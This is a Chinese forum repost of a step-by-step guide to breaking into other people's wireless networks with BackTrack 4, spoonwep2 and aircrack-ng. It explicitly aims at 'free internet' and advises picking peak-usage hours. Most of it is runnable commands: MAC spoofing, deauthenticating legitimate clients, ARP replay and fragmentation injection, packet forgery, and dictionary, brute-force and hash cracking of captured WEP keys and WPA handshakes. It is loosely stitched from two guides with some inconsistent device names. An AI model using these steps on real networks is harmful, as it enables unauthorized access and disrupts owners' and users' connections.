bt4破解wpa2步骤.doc

但是现在比较新的机器的无线网卡都不支持BT3，所以我又亲自研究了BT4的U盘使用，我的方法为查资料与自己摸索确实可行的方法，如下（U盘最好2G或者以上）： 1、下载bt4-final.iso，官方网站下吧（挂迅雷下）http://www.backtrack-linux.org，大小为1570 MB。 2、下载unetbootin，这个是把iso文件刻录进U盘的工具，bt4比bt3复杂，没有直接的U盘版本。官方下载地址： 3、下载 spoonwep2 spoonwpa 破解工具用于BT4下的deb安装包（挂迅雷，如果连接失效请直接搜索或要我发给你）： thunder://QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa 4、打开2下载的unetbootin-windows-latest.exe，选择backtrack，4f，选好U盘，确定，等待几分钟，文件都拷贝到U盘。 5、4执行完后它提示要不要重启，先不要重启，先把3下载的deb文件改名成你熟悉的，如s.deb，拷贝到U盘根目录。（到此要用到的工具已经准备完毕） 6、重启，设置bios，用U盘启动，这个时候来到unetbootin的启动选择画面，选择default就可以，2分钟后停留在root/bt的命令行前。输入startx启动图形画面。 7、来到图形桌面，打开开始菜单的system menu – home folder，打开后，向上一直到根目录，打开media – cdrom，一般这里就是你的U盘，把5拷贝在里面的s.bed复制到linux桌面。 8、打开左下角快捷启动的命令提示符，输入：dpkg -i s.deb，这个时候就会安装好spoonwep2 spoonwpa，在桌面也多了一个文件夹可以打开spoonwep2 spoonwpa，不要直接打开。 9、命令提示符下输入：ifconfig -a 找到你自己的无线网卡（从mac上看，不会的自己搜索下），比如我的是：wlan0 10、继续输入 airmon-ng start wlan0 6，（或者wlan1等等）它会提示monitor mode enabled on mon0，这样mon0就虚拟成功。 11、继续输入 spoonwep，它会打开spoonwep2，网卡那里选择mon0，驱动是normal，类型是unknown victim，下一步直接点launch。 12、我到这一步的时候，命令提示符里面会有错误信息出现，spoonwep2返回不了找到的网络，但是后面的spoonwep vict.scan窗口已经找到很多，我的解决方法是：看命令提示符的错误，应该是找不到一个wscapture-01.txt文件，打开它提示的目录，把里面的wscapture-01.csv 复制粘贴成 wscapture-01.txt，OK，再看spoonwep2，已经列出无线网络了。 13、选一个，破解，后面那个画面的攻击模式我一般选 0841 REPLAY ATTACK，其他不用改，你可以几个攻击模式都试试，一般有人在下载东西会很快的。 14、spoonwpa差不多如上，但是wpa2的网络一般不行的 BT4+spoonwep2破解无线路由器 管理提醒： 本帖被 刹那感觉 从 ≮破解转载区≯ 移动到本区(2010-01-06) 一：启动BT4 首先下载好BT4和spoonwep2 将两者解压，再把解压出来的spoonwep2.lzm放到BT4\modules目录中如果你是下载的光盘版就直接刻录成光碟，然后重启电脑的时候选择光盘启动项目，如果你是下载的USB版就直接保存到USB上，启用USB启动，VM版的BT4可能对集成的无线网卡支持不太好，USB无线网卡则支持得很好，启动方法很多，但是都很麻烦，我这里讲一种硬盘启动方法： BT4（bt4-pre-final版）是基于ubuntu的linux，采用grub方式引导。 一、 准备工作： 1、下载grub4dos软件最新版； 2、下载bt4-pre-final.iso，把bt4-pre-final.iso中的boot、casper 文件夹复制出来放到E盘根目录下。 二、步骤： 1、把grub4dos压缩包解压缩，将grldr、grub.exe、menu.lst三个文件拷入C盘根目录； 2、编辑C盘下的boot.ini，在boot.ini的最后加上一行： c:\grldr="Load GRUB4DOS"。如果boot.ini中的timeout值为零，把它设置为大于0的数字，例如timeout=3，然后保存boot.ini。 3、编辑C盘下的menu.lst color black/cyan yellow/cyan timeout 30 default /default fallback 1 splashimage (hd0,5)/boot/grub/bt4.xpm.gz title Boot BackTrack 4 kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317 initrd (hd0,5)/boot/initrd.gz title Start Windows rootnoverify (hd0,0) makeactive chainloader +1 title Shutdown the Computer halt title Reboot the Computer reboot 可以将原menu.lst里面的内容都删除，写入上述内容，需注意格式。关键的一点是：kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317 此行参考bt4里面的menu.lst，只是添加了(hd0,5)，如果bt4放在C盘启动则不需要添加。(hd0,5)的计算是hd0为第一块主硬盘，在grub下逻辑分区从4开始，所以D盘即为4，E盘即为5。重启选择Load GRUB4DOS，再选Boot BackTrack 4，即可启动BT4。此方法bt4将E盘当作cd读取，系统启动后不能识别硬盘其他分区，所在的E盘可读不可写，不知甚原因。 二：破解密码（GUI版） 通过以上的几种方法皆可启动下载的BT4，之后就需要输入“startx”进入系统了，后进入系统的时候就开始破解了，现在就要去找spoonwep2了，左下角开始的旁边有个黑色的框框，也就是SHELL，点击，输入：spoonwep就可以显示spoonwep2的界面了。 在各项选项里选择以下操作 NET CARD 网卡接口 选择 WIFI0 DRIVER 驱动 选择 NORMAL MODE 模式 选择 UNKNOWN VICTIM 然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。 好了，可以看见VICTMS DISCOVERY界面左面的选项是默认的CHANHOPPING 这个事无线的AP的工作频道，不要动，直接点击右侧的LAUNCH 按钮。 这时会弹出抓包窗口（SCAN），可作为参考，也可不用理会。稍等一会儿，如果能够找到符合要求的信号，会在当前的victims discovery 窗口中显示扫描到的信息，其中： ESSID 路由广播名称 MAC 路由的MAC地址 CHAN 使用的频道 POW 信号强度 DATA (注意：这个数值一直为0基本无法破解，你可另寻时机等到有DATA再破） CLIS 空白代表无客户端，打钩则代表有客户端 每一行代表一个扫描到的无限AP信号，点击选中你要破解的信号（尽量选择有DATA以及CLIS后有对号的信号进行破解）；然后在信号信息框的下面相应的显示出在AP当前的客户端，你可以点击选中一个客户端（这样更容易破解一些），也可以不选。然后点击窗口下边的selectionOK按钮，就会进入attack panel界面。 在attack panel界面，攻击模式下拉框中几个选项的区别如下（由客户端建议选择第一项，无客户端建议选择第四项）： ARP REPLAY ATTACK （有客户端时用,3ARP注入） P0841 REPLAY ATTACK (第三选择，2交互注入） CHOPCHOP & FORGEATTACK （第二选择，4断续注入） FRAGMENTATION & FORGE ATTACK（首选，5碎片注入） 然后直接点击launch即可是破解，这时同样会在任务栏出现一个新的窗口，你可以用鼠标点击出来看一看，里面会显示一些相关的信息，如信号强度等。大家注意上面图片里有个‘24858 IVS’，其中IVS就是我们要寻找的带有特殊数据包的IVS格式包，我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了，如果到了4W还没显示密码的话，我还是劝告童鞋去换个目标吧，这段抓包的时间就去喝喝茶，去看看书吧。因为我们是被动抓的包，所以必须跳个好点，流量大的时间段去破解，因为那时候对方在下迅雷的时候，会飞快的产生IVS包，所以我建议大家在12点半到1点半，晚上九点半到11点半，这两段时间内选择破解，因为是上网的高峰。注意，最后破解出来的密码是在attack panel界面下方显示（而不是在spoonwep dump窗口显示）。 密码就是：52 15 21 13 14. 然后，重启进入XP系统，选择无线连接里的你刚才破解的那个AP，填上密钥，就能享受免费带来的上网乐趣了。 ============================================================ 以上是最最最最简便的傻瓜方法，一般都是那样破解的方便也省事儿，但是有的时候，目标AP不会产生大量的IVS包，会对于我们抓包产生非常大的影响，因为本身没有太多的流量产生，我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜，这样对于必须要抓至少10000IVS来说，简直是浪费时间，所以，这时候我们就要化被动为主动的注入，使其多产生相互之间的更多数据交汇，这样针对没有客户的AP或者在空闲的AP来说是非常有效地。 三:手动注入（SHELL代码注入，新手跳过） 以下主要针对SHELL的代码输入操作，其实SPOONWEP就看做一个界面型的代码整合软件，现在我们要脱离它的帮助，自己去手动注入。还是拿5100网卡做演示（其他的网卡方法大体一致，网上搜更多的资料看看吧） shell 1:---------------------------------------- 1.ifconfig -a <wlan0 ... xx:xx:xx:xx:xx:xx> [ macchanger -m 00:11:22:33:44:55 wlan0 <修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入> ] 2.ifconfig -a wlan0 up (5100可能要加载网卡才支持注入?) 3.airmon-ng start wlan0 6 <monitor mode enabled on mon0> (6是频道) 另一说5100要支持注入用airmon-ng start wlan0 如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0" [ aireplay-ng -9 mon0 / aireplay-ng --test mon0 <Injection is working/No anwser>(注入攻击成功/不成功) (检测你的网卡是否支持注入) ] 4.airodump-ng -w pack -c 6 mon0/wlan0 (pack是随便起的获取的ivs的保存文件的名字) 另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0 shell 2:---------------------------------------- 一、有客户端： 破解:abcd四种方式 a.合法客户端产生大量有效的数据，能直接获得大量cap。 收到10000以上data后，直接转shell 3,破解密码 b.合法客户端只能产生少量数据，就需要注入<-3>攻击加速产生大量数据。 5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行) <Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行> c.合法客户端不在通信，注入模式不成功， 用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接， 新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入 5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0 6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0 (可能要另开窗) d.有客户端，并且客户端能产生有效arp 数据的另类破解方式 输入modprobe –r iwl3945 (加载网卡) 输入modprobe ipwraw 输入airmon-ng start wlan0 6 现在，只要一个命令就搞定，输入: 输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。 <key: 12:34:56:78:90> 二、无客户端： 5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0 (我成功了) 另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0 <Authentication successful> <Association successful> (建立虚拟伪装连接) 如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写) 破解:abcd四种方式 a.-2 crack mode --------------- 建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击 6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0 发包成功后可得到足够的ivs，然后用aircrack-ng破解 b.-3 crack mode --------------- 6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0 7.用aircrack-ng破解<自己添加的步骤?> c.-4 crack mode --------------- -4攻击模式；制造数据包；-2交互式攻击模式 6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0 <?yes> <Saving keystream in replay_dec-0523-075615.xor> 7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp (提取上面xor 文件来伪造一个arp包) 8.aireplay-ng -2 -r myarp mon0 一说用aireplay-ng -2 -r myarp -x 512 mon0 (发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨) 9.用aircrack-ng破解 d.-5 crack mode --------------- -5碎片攻击模式；制造数据包；-2交互式攻击模式 (我成功过) 6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0 <?yes> <Saving keystream in fragment-1216-201426.xor> (利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）) 7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp (Myarp随便起的文件名) <Wrote packet to: myarp> 8.aireplay-ng -2 -r myarp -x 256/512 mon0 <?yes> (这时，前面的抓包窗口上的data 将迅速增加) (512是攻击速度，1024是最大值) 9.采用aircrack-ng 来进行破解 shell 3:---------------------------------------- aircrack-ng *.cap 如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs (我成功了) 另一说用aircrack-ng -n 64 -b APmac pack-01.cap <KEY FOUND! [......] <ASCII:XXXXX>> 附: 5100用BT4+spoonwep2破解 1.把spoonwep2放在BT4\modules\下,启动BT4 2. ln -fs bash /bin/sh ls -al /bin/sh <显示bash为成功,dash为失败> 3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么， 关闭一下spoonwep2再重启spoonwep2， 这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密 码的出来(sata数据包到30000个左右)。 (注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解) ---------------------end--------------------- ---------------------WPA--------------------- 1.ifconfig -a <wlan0 ... xx:xx:xx:xx:xx:xx> 2.ifconfig -a wlan0 up 3.airmon-ng start wlan0 6 <monitor mode enabled on mon0> (6是频道) 4.airodump-ng -w 12345 -c 6 mon0/wlan0 (保存名为12345.cap) (-w：写入文件，-c：截取cap的频道) 5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0 或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对) <18:56:20 Sending 64 directed DeAuth,... 一些类似行> (-c后面为合法无线客户端的MAC地址) (迫使AP重新与已连接的合法客户端重新握手验证) (攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万， 因为它只要一个包含WPA握手验证包就可以了) Cap数据包破解: a.暴力破解 6.aircrack-ng -x -f 2 12345*.cap 另一说是用aircrack-ng -z -b (ap mac) 12345*.cap b.字典破解 6.aircrack-ng -w password.txt 12345*.cap 另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap ( -w：是字典破解模式 Password.txt是你事先准备好的字典。 技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认 的工作目录在/root）。 请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。 ) c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解 启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key... <Key Found! [xxxxxxxx]> d.HASH破解 6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写) (Windows版本操作步骤与其Linux下版本完全一致) ( 　　参数解释： 　　-f 这里跟上采用的字典 　　-d 生成的Table文件名称 　　-s 目标AP的ESSID ) 7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK ( 　　参数解释： 　　-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash 　　-r 事先捕获的WPA握手数据包 　　-s 目标AP的ESSID ) ---------------------end--------------------- WPA破解，怎么知道有握手包被截获？ airodump-ng监视窗右上角有提示: ...... WPA handshake: 00:90:4c:8e:00:65 BT4抓包后，cap文件保存在哪？ 输入ls可以看到啊,默认在root下。 如何获得合法端mac？ windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用 Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据 包解密方可看到客户端MAC。 前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac BSSID STATION ... aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb 如何查找隐藏的SSID？ 1.在BT4下先打开一个shell,输入 airodump-ng 网卡端口 2.打开另一个shell,输入 aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口 可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止 3.然后就可以在上个shell,看到显示出来的SSID。 最后简单的概括就是以下的八部操作： 1) ifconfig -a 2) airmon-ng start wifi0 6 3) airodump-ng --ivs -w name -c 6 ath1 4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 -1 is -one 5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 新的第5步： aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1 6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp 7) aireplay-ng -2 -r mrarp -x 1024 ath1 8) aircrack-ng -n 64 -b ap_mac name-01.ivs ================================================================= 以上大概就是注入的全部过程了，大家看着眼花，我自己转的也糊里糊涂。